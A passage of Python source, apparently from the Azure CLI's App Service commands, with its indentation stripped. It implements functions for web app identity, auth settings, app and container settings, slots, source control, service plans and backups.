client = web_client_factory(cli_ctx)
result = list(client.deleted_web_apps.list())
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def assign_identity(cmd, resource_group_name, name, role='Contributor', slot=None, scope=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='SystemAssigned')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, slot=None):
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
webapp.identity = ManagedServiceIdentity(type='None')
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
print(arg, values[arg])
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(client, linux)
return [s['displayName'] for s in runtime_helper.stacks]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
def get_connection_strings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_constr_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.connection_string_names or []
result = [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_constr_names} for p in result.properties]
return result
def get_azure_storage_accounts(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
slot_azure_storage_config_names = client.web_apps.list_slot_configuration_names(resource_group_name, name) \
.azure_storage_config_names or []
return [{'name': p,
'value': result.properties[p],
'slotSetting': p in slot_azure_storage_config_names} for p in result.properties]
def _fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot=None):
profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
url = next(p['publishUrl'] for p in profiles if p['publishMethod'] == 'FTP')
setattr(webapp, 'ftpPublishingUrl', url)
return webapp
def _format_fx_version(custom_image_name, container_config_type=None):
fx_version = custom_image_name.strip()
fx_version_lower = fx_version.lower()
# handles case of only spaces
if fx_version:
if container_config_type:
fx_version = '{}|{}'.format(container_config_type, custom_image_name)
elif not fx_version_lower.startswith('docker|'):
fx_version = '{}|{}'.format('DOCKER', custom_image_name)
else:
fx_version = ' '
return fx_version
def _add_fx_version(cmd, resource_group_name, name, custom_image_name, slot=None):
fx_version = _format_fx_version(custom_image_name)
web_app = get_webapp(cmd, resource_group_name, name, slot)
linux_fx = fx_version if web_app.reserved else None
windows_fx = fx_version if web_app.is_xenon else None
return update_site_configs(cmd, resource_group_name, name,
linux_fx_version=linux_fx, windows_fx_version=windows_fx, slot=slot)
def _delete_linux_fx_version(cmd, resource_group_name, name, slot=None):
return update_site_configs(cmd, resource_group_name, name, linux_fx_version=' ', slot=slot)
def _get_fx_version(cmd, resource_group_name, name, slot=None):
site_config = get_site_configs(cmd, resource_group_name, name, slot)
return site_config.linux_fx_version or site_config.windows_fx_version or ''
def url_validator(url):
try:
result = urlparse(url)
return all([result.scheme, result.netloc, result.path])
except ValueError:
return False
def _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot=None):
from base64 import b64decode
linux_fx_version = _get_fx_version(cmd, resource_group_name, name, slot)
if not any([linux_fx_version.startswith(s) for s in MULTI_CONTAINER_TYPES]):
raise CLIError("Cannot decode config that is not one of the"
" following types: {}".format(','.join(MULTI_CONTAINER_TYPES)))
return b64decode(linux_fx_version.split('|')[1].encode('utf-8'))
def _get_linux_multicontainer_encoded_config_from_file(file_name):
from base64 import b64encode
config_file_bytes = None
if url_validator(file_name):
response = urlopen(file_name, context=_ssl_context())
config_file_bytes = response.read()
else:
with open(file_name, 'rb') as f:
config_file_bytes = f.read()
# Decode base64 encoded byte array into string
return b64encode(config_file_bytes).decode('utf-8')
# for any modifications to the non-optional parameters, adjust the reflection logic accordingly
# in the method
def update_site_configs(cmd, resource_group_name, name, slot=None,
linux_fx_version=None, windows_fx_version=None, php_version=None, python_version=None, # pylint: disable=unused-argument
net_framework_version=None, # pylint: disable=unused-argument
java_version=None, java_container=None, java_container_version=None, # pylint: disable=unused-argument
remote_debugging_enabled=None, web_sockets_enabled=None, # pylint: disable=unused-argument
always_on=None, auto_heal_enabled=None, # pylint: disable=unused-argument
use32_bit_worker_process=None, # pylint: disable=unused-argument
min_tls_version=None, # pylint: disable=unused-argument
http20_enabled=None, # pylint: disable=unused-argument
app_command_line=None, # pylint: disable=unused-argument
ftps_state=None, # pylint: disable=unused-argument
generic_configurations=None):
configs = get_site_configs(cmd, resource_group_name, name, slot)
if linux_fx_version:
if linux_fx_version.strip().lower().startswith('docker|'):
update_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE=false"])
else:
delete_app_settings(cmd, resource_group_name, name, ["WEBSITES_ENABLE_APP_SERVICE_STORAGE"])
import inspect
frame = inspect.currentframe()
bool_flags = ['remote_debugging_enabled', 'web_sockets_enabled', 'always_on',
'auto_heal_enabled', 'use32_bit_worker_process', 'http20_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[3:]:
if arg != 'generic_configurations' and values.get(arg, None):
setattr(configs, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
generic_configurations = generic_configurations or []
result = {}
for s in generic_configurations:
try:
result.update(get_json_object(s))
except CLIError:
config_name, value = s.split('=', 1)
result[config_name] = value
for config_name, value in result.items():
setattr(configs, config_name, value)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_configuration', slot, configs)
def delete_app_settings(cmd, resource_group_name, name, setting_names, slot=None):
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
app_settings.properties.pop(setting_name, None)
if slot_cfg_names.app_setting_names and setting_name in slot_cfg_names.app_setting_names:
slot_cfg_names.app_setting_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
return _build_app_settings_output(result.properties, slot_cfg_names.app_setting_names)
def delete_azure_storage_accounts(cmd, resource_group_name, name, custom_id, slot=None):
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
azure_storage_accounts.properties.pop(custom_id, None)
if slot_cfg_names.azure_storage_config_names and custom_id in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.remove(custom_id)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
return result.properties
def _ssl_context():
if sys.version_info < (3, 4) or (in_cloud_console() and sys.platform.system() == 'Windows'):
try:
return ssl.SSLContext(ssl.PROTOCOL_TLS) # added in python 2.7.13 and 3.6
except AttributeError:
return ssl.SSLContext(ssl.PROTOCOL_TLSv1)
return ssl.create_default_context()
def _build_app_settings_output(app_settings, slot_cfg_names):
slot_cfg_names = slot_cfg_names or []
return [{'name': p,
'value': app_settings[p],
'slotSetting': p in slot_cfg_names} for p in _mask_creds_related_appsettings(app_settings)]
def update_connection_strings(cmd, resource_group_name, name, connection_string_type,
settings=None, slot=None, slot_settings=None):
from azure.mgmt.web.models import ConnStringValueTypePair
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
for name_value in settings + slot_settings:
# split at the first '=', connection string should not have '=' in the name
conn_string_name, value = name_value.split('=', 1)
if value[0] in ["'", '"']: # strip away the quots used as separators
value = value[1:-1]
conn_strings.properties[conn_string_name] = ConnStringValueTypePair(value=value,
type=connection_string_type)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
if slot_settings:
new_slot_setting_names = [n.split('=', 1)[0] for n in slot_settings]
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.connection_string_names = slot_cfg_names.connection_string_names or []
slot_cfg_names.connection_string_names += new_slot_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def delete_connection_strings(cmd, resource_group_name, name, setting_names, slot=None):
conn_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_connection_strings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
is_slot_settings = False
for setting_name in setting_names:
conn_strings.properties.pop(setting_name, None)
if slot_cfg_names.connection_string_names and setting_name in slot_cfg_names.connection_string_names:
slot_cfg_names.connection_string_names.remove(setting_name)
is_slot_settings = True
if is_slot_settings:
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_connection_strings',
conn_strings.properties, slot, client)
CONTAINER_APPSETTING_NAMES = ['DOCKER_REGISTRY_SERVER_URL', 'DOCKER_REGISTRY_SERVER_USERNAME',
'DOCKER_REGISTRY_SERVER_PASSWORD', "WEBSITES_ENABLE_APP_SERVICE_STORAGE"]
APPSETTINGS_TO_MASK = ['DOCKER_REGISTRY_SERVER_PASSWORD']
def update_container_settings(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
websites_enable_app_service_storage=None, docker_registry_server_password=None,
multicontainer_config_type=None, multicontainer_config_file=None, slot=None):
settings = []
if docker_registry_server_url is not None:
settings.append('DOCKER_REGISTRY_SERVER_URL=' + docker_registry_server_url)
if (not docker_registry_server_user and not docker_registry_server_password and
docker_registry_server_url and '.azurecr.io' in docker_registry_server_url):
logger.warning('No credential was provided to access Azure Container Registry. Trying to look up...')
parsed = urlparse(docker_registry_server_url)
registry_name = (parsed.netloc if parsed.scheme else parsed.path).split('.')[0]
try:
docker_registry_server_user, docker_registry_server_password = _get_acr_cred(cmd.cli_ctx, registry_name)
except Exception as ex: # pylint: disable=broad-except
logger.warning("Retrieving credentials failed with an exception:'%s'", ex) # consider throw if needed
if docker_registry_server_user is not None:
settings.append('DOCKER_REGISTRY_SERVER_USERNAME=' + docker_registry_server_user)
if docker_registry_server_password is not None:
settings.append('DOCKER_REGISTRY_SERVER_PASSWORD=' + docker_registry_server_password)
if docker_custom_image_name is not None:
_add_fx_version(cmd, resource_group_name, name, docker_custom_image_name, slot)
if websites_enable_app_service_storage:
settings.append('WEBSITES_ENABLE_APP_SERVICE_STORAGE=' + websites_enable_app_service_storage)
if docker_registry_server_user or docker_registry_server_password or docker_registry_server_url or websites_enable_app_service_storage: # pylint: disable=line-too-long
update_app_settings(cmd, resource_group_name, name, settings, slot)
settings = get_app_settings(cmd, resource_group_name, name, slot)
if multicontainer_config_file and multicontainer_config_type:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
update_site_configs(cmd, resource_group_name, name, linux_fx_version=linux_fx_version, slot=slot)
elif multicontainer_config_file or multicontainer_config_type:
logger.warning('Must change both settings --multicontainer-config-file FILE --multicontainer-config-type TYPE')
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
slot=slot))
def update_container_settings_functionapp(cmd, resource_group_name, name, docker_registry_server_url=None,
docker_custom_image_name=None, docker_registry_server_user=None,
docker_registry_server_password=None, slot=None):
return update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
docker_custom_image_name, docker_registry_server_user, None,
docker_registry_server_password, multicontainer_config_type=None,
multicontainer_config_file=None, slot=slot)
def _get_acr_cred(cli_ctx, registry_name):
from azure.mgmt.containerregistry import ContainerRegistryManagementClient
from azure.cli.core.commands.parameters import get_resources_in_subscription
client = get_mgmt_service_client(cli_ctx, ContainerRegistryManagementClient).registries
result = get_resources_in_subscription(cli_ctx, 'Microsoft.ContainerRegistry/registries')
result = [item for item in result if item.name.lower() == registry_name]
if not result or len(result) > 1:
raise CLIError("No resource or more than one were found with name '{}'.".format(registry_name))
resource_group_name = parse_resource_id(result[0].id)['resource_group']
registry = client.get(resource_group_name, registry_name)
if registry.admin_user_enabled: # pylint: disable=no-member
cred = client.list_credentials(resource_group_name, registry_name)
return cred.username, cred.passwords[0].value
raise CLIError("Failed to retrieve container registry credentials. Please either provide the "
"credentials or run 'az acr update -n {} --admin-enabled true' to enable "
"admin first.".format(registry_name))
def delete_container_settings(cmd, resource_group_name, name, slot=None):
_delete_linux_fx_version(cmd, resource_group_name, name, slot)
delete_app_settings(cmd, resource_group_name, name, CONTAINER_APPSETTING_NAMES, slot)
def show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
return _mask_creds_related_appsettings(_filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config, slot))
def show_container_settings_functionapp(cmd, resource_group_name, name, slot=None):
return show_container_settings(cmd, resource_group_name, name, show_multicontainer_config=None, slot=slot)
def _filter_for_container_settings(cmd, resource_group_name, name, settings,
show_multicontainer_config=None, slot=None):
result = [x for x in settings if x['name'] in CONTAINER_APPSETTING_NAMES]
fx_version = _get_fx_version(cmd, resource_group_name, name, slot).strip()
if fx_version:
added_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME',
'value': fx_version}
result.append(added_image_name)
if show_multicontainer_config:
decoded_value = _get_linux_multicontainer_decoded_config(cmd, resource_group_name, name, slot)
decoded_image_name = {'name': 'DOCKER_CUSTOM_IMAGE_NAME_DECODED',
'value': decoded_value}
result.append(decoded_image_name)
return result
# TODO: remove this when #3660(service tracking issue) is resolved
def _mask_creds_related_appsettings(settings):
for x in [x1 for x1 in settings if x1 in APPSETTINGS_TO_MASK]:
settings[x] = None
return settings
def add_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
binding = HostNameBinding(location=webapp.location, site_name=webapp.name)
if slot is None:
return client.web_apps.create_or_update_host_name_binding(resource_group_name, webapp.name, hostname, binding)
return client.web_apps.create_or_update_host_name_binding_slot(resource_group_name, webapp.name, hostname, binding,
slot)
def delete_hostname(cmd, resource_group_name, webapp_name, hostname, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot is None:
return client.web_apps.delete_host_name_binding(resource_group_name, webapp_name, hostname)
return client.web_apps.delete_host_name_binding_slot(resource_group_name, webapp_name, slot, hostname)
def list_hostnames(cmd, resource_group_name, webapp_name, slot=None):
result = list(_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'list_host_name_bindings', slot))
for r in result:
r.name = r.name.split('/')[-1]
return result
def get_external_ip(cmd, resource_group_name, webapp_name):
# logics here are ported from portal
client = web_client_factory(cmd.cli_ctx)
webapp = client.web_apps.get(resource_group_name, webapp_name)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(webapp_name))
if webapp.hosting_environment_profile:
address = client.app_service_environments.list_vips(
resource_group_name, webapp.hosting_environment_profile.name)
if address.internal_ip_address:
ip_address = address.internal_ip_address
else:
vip = next((s for s in webapp.host_name_ssl_states if s.ssl_state == SslState.ip_based_enabled), None)
ip_address = vip.virtual_ip if vip else address.service_ip_address
else:
ip_address = _resolve_hostname_through_dns(webapp.default_host_name)
return {'ip': ip_address}
def _resolve_hostname_through_dns(hostname):
import socket
return socket.gethostbyname(hostname)
def create_webapp_slot(cmd, resource_group_name, webapp, slot, configuration_source=None):
client = web_client_factory(cmd.cli_ctx)
site = client.web_apps.get(resource_group_name, webapp)
if not site:
raise CLIError("'{}' app doesn't exist".format(webapp))
location = site.location
slot_def = Site(server_farm_id=site.server_farm_id, location=location)
clone_from_prod = None
slot_def.site_config = SiteConfig()
poller = client.web_apps.create_or_update_slot(resource_group_name, webapp, slot_def, slot)
result = LongRunningOperation(cmd.cli_ctx)(poller)
if configuration_source:
clone_from_prod = configuration_source.lower() == webapp.lower()
site_config = get_site_configs(cmd, resource_group_name, webapp,
None if clone_from_prod else configuration_source)
_generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_configuration', slot, site_config)
# slot create doesn't clone over the app-settings and connection-strings, so we do it here
# also make sure slot settings don't get propagated.
if configuration_source:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, webapp)
src_slot = None if clone_from_prod else configuration_source
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_application_settings',
src_slot)
for a in slot_cfg_names.app_setting_names or []:
app_settings.properties.pop(a, None)
connection_strings = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp,
'list_connection_strings',
src_slot)
for a in slot_cfg_names.connection_string_names or []:
connection_strings.properties.pop(a, None)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_application_settings',
app_settings.properties, slot, client)
_generic_settings_operation(cmd.cli_ctx, resource_group_name, webapp,
'update_connection_strings',
connection_strings.properties, slot, client)
result.name = result.name.split('/')[-1]
return result
def config_source_control(cmd, resource_group_name, name, repo_url, repository_type='git', branch=None, # pylint: disable=too-many-locals
manual_integration=None, git_token=None, slot=None, cd_app_type=None,
app_working_dir=None, nodejs_task_runner=None, python_framework=None,
python_version=None, cd_account_create=None, cd_project_url=None, test=None,
slot_swap=None, private_repo_username=None, private_repo_password=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
if cd_project_url:
# Add default values
cd_app_type = 'AspNet' if cd_app_type is None else cd_app_type
python_framework = 'Django' if python_framework is None else python_framework
python_version = 'Python 3.5.3 x86' if python_version is None else python_version
webapp_list = None if test is None else list_webapp(resource_group_name)
vsts_provider = VstsContinuousDeliveryProvider()
cd_app_type_details = {
'cd_app_type': cd_app_type,
'app_working_dir': app_working_dir,
'nodejs_task_runner': nodejs_task_runner,
'python_framework': python_framework,
'python_version': python_version
}
try:
status = vsts_provider.setup_continuous_delivery(cmd.cli_ctx, resource_group_name, name, repo_url,
branch, git_token, slot_swap, cd_app_type_details,
cd_project_url, cd_account_create, location, test,
private_repo_username, private_repo_password, webapp_list)
except RuntimeError as ex:
raise CLIError(ex)
logger.warning(status.status_message)
return status
else:
non_vsts_params = [cd_app_type, app_working_dir, nodejs_task_runner, python_framework,
python_version, cd_account_create, test, slot_swap]
if any(non_vsts_params):
raise CLIError('Following parameters are of no use when cd_project_url is None: ' +
'cd_app_type, app_working_dir, nodejs_task_runner, python_framework,' +
'python_version, cd_account_create, test, slot_swap')
from azure.mgmt.web.models import SiteSourceControl, SourceControl
if git_token:
sc = SourceControl(location=location, source_control_name='GitHub', token=git_token)
client.update_source_control('GitHub', sc)
source_control = SiteSourceControl(location=location, repo_url=repo_url, branch=branch,
is_manual_integration=manual_integration,
is_mercurial=(repository_type != 'git'))
# SCC config can fail if previous commands caused SCMSite shutdown, so retry here.
for i in range(5):
try:
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'create_or_update_source_control',
slot, source_control)
return LongRunningOperation(cmd.cli_ctx)(poller)
except Exception as ex: # pylint: disable=broad-except
import re
ex = ex_handler_factory(no_throw=True)(ex)
# for non server errors(50x), just throw; otherwise retry 4 times
if i == 4 or not re.findall(r'\(50\d\)', str(ex)):
raise
logger.warning('retrying %s/4', i + 1)
time.sleep(5) # retry in a moment
def update_git_token(cmd, git_token=None):
'''
Update source control token cached in Azure app service. If no token is provided,
the command will clean up existing token.
'''
client = web_client_factory(cmd.cli_ctx)
from azure.mgmt.web.models import SourceControl
sc = SourceControl(name='not-really-needed', source_control_name='GitHub', token=git_token or '')
return client.update_source_control('GitHub', sc)
def show_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_source_control', slot)
def delete_source_control(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete_source_control', slot)
def enable_local_git(cmd, resource_group_name, name, slot=None):
client = web_client_factory(cmd.cli_ctx)
location = _get_location_from_webapp(client, resource_group_name, name)
site_config = SiteConfigResource(location=location)
site_config.scm_type = 'LocalGit'
if slot is None:
client.web_apps.create_or_update_configuration(resource_group_name, name, site_config)
else:
client.web_apps.create_or_update_configuration_slot(resource_group_name, name,
site_config, slot)
return {'url': _get_local_git_url(cmd.cli_ctx, client, resource_group_name, name, slot)}
def sync_site_repo(cmd, resource_group_name, name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'sync_repository', slot)
except CloudError as ex: # Because of bad spec, sdk throws on 200. We capture it here
if ex.status_code not in [200, 204]:
raise ex
def list_app_service_plans(cmd, resource_group_name=None):
client = web_client_factory(cmd.cli_ctx)
if resource_group_name is None:
plans = list(client.app_service_plans.list())
else:
plans = list(client.app_service_plans.list_by_resource_group(resource_group_name))
for plan in plans:
# prune a few useless fields
del plan.geo_region
del plan.subscription
return plans
def create_app_service_plan(cmd, resource_group_name, name, is_linux, hyper_v, sku='B1', number_of_workers=None,
location=None, tags=None):
if is_linux and hyper_v:
raise CLIError('usage error: --is-linux | --hyper-v')
client = web_client_factory(cmd.cli_ctx)
sku = _normalize_sku(sku)
if location is None:
location = _get_location_from_resource_group(cmd.cli_ctx, resource_group_name)
# the api is odd on parameter naming, have to live with it for now
sku_def = SkuDescription(tier=get_sku_name(sku), name=sku, capacity=number_of_workers)
plan_def = AppServicePlan(location=location, tags=tags, sku=sku_def,
reserved=(is_linux or None), hyper_v=(hyper_v or None), name=name)
return client.app_service_plans.create_or_update(resource_group_name, name, plan_def)
def update_app_service_plan(instance, sku=None, number_of_workers=None,
admin_site_name=None):
sku_def = instance.sku
if sku is not None:
sku = _normalize_sku(sku)
sku_def.tier = get_sku_name(sku)
sku_def.name = sku
if number_of_workers is not None:
sku_def.capacity = number_of_workers
instance.sku = sku_def
instance.sku = sku_def
if admin_site_name is not None:
instance.admin_site_name = admin_site_name
return instance
def show_backup_configuration(cmd, resource_group_name, webapp_name, slot=None):
try:
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except Exception: # pylint: disable=broad-except
raise CLIError('Backup configuration not found')
def list_backups(cmd, resource_group_name, webapp_name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'list_backups',
slot)
def create_backup(cmd, resource_group_name, webapp_name, storage_account_url,
db_name=None, db_type=None,
db_connection_string=None, backup_name=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_request = BackupRequest(backup_request_name=backup_name,
storage_account_url=storage_account_url, databases=db_setting)
if slot:
return client.web_apps.backup_slot(resource_group_name, webapp_name, backup_request, slot)
return client.web_apps.backup(resource_group_name, webapp_name, backup_request)
def update_backup_schedule(cmd, resource_group_name, webapp_name, storage_account_url=None,
frequency=None, keep_at_least_one_backup=None,
retention_period_in_days=None, db_name=None,
db_connection_string=None, db_type=None, backup_name=None, slot=None):
configuration = None
if backup_name and backup_name.lower().endswith('.zip'):
backup_name = backup_name[:-4]
if not backup_name:
from datetime import datetime
backup_name = '{0}_{1}'.format(webapp_name, datetime.utcnow().strftime('%Y%m%d%H%M'))
try:
configuration = _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name,
'get_backup_configuration', slot)
except DefaultErrorResponseException:
# No configuration set yet
if not all([storage_account_url, frequency, retention_period_in_days,
keep_at_least_one_backup]):
raise CLIError('No backup configuration found. A configuration must be created. ' +
'Usage: --container-url URL --frequency TIME --retention DAYS ' +
'--retain-one TRUE/FALSE')
# If arguments were not specified, use the values in the current backup schedule
if storage_account_url is None:
storage_account_url = configuration.storage_account_url
if retention_period_in_days is None:
retention_period_in_days = configuration.backup_schedule.retention_period_in_days
if keep_at_least_one_backup is None:
keep_at_least_one_backup = configuration.backup_schedule.keep_at_least_one_backup
else:
keep_at_least_one_backup = keep_at_least_one_backup.lower() == 'true'
if frequency:
# Parse schedule frequency
frequency_num, frequency_unit = _parse_frequency(frequency)
else:
frequency_num = configuration.backup_schedule.frequency_interval
frequency_unit = configuration.backup_schedule.frequency_unit
if configuration and configuration.databases:
db = configuration.databases[0]
db_type = db_type or db.database_type
db_name = db_name or db.name
db_connection_string = db_connection_string or db.connection_string
db_setting = _create_db_setting(db_name, db_type, db_connection_string)
backup_schedule = BackupSchedule(frequency_interval=frequency_num, frequency_unit=frequency_unit.name,
keep_at_least_one_backup=keep_at_least_one_backup,
retention_period_in_days=retention_period_in_days)
backup_request = BackupRequest(backup_request_name=backup_name, backup_schedule=backup_schedule,
enabled=True, storage_account_url=storage_account_url,
databases=db_setting)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, webapp_name, 'update_backup_configuration',
slot, backup_request)
def restore_backup(cmd, resource_group_name, webapp_name, storage_account_url, backup_name,
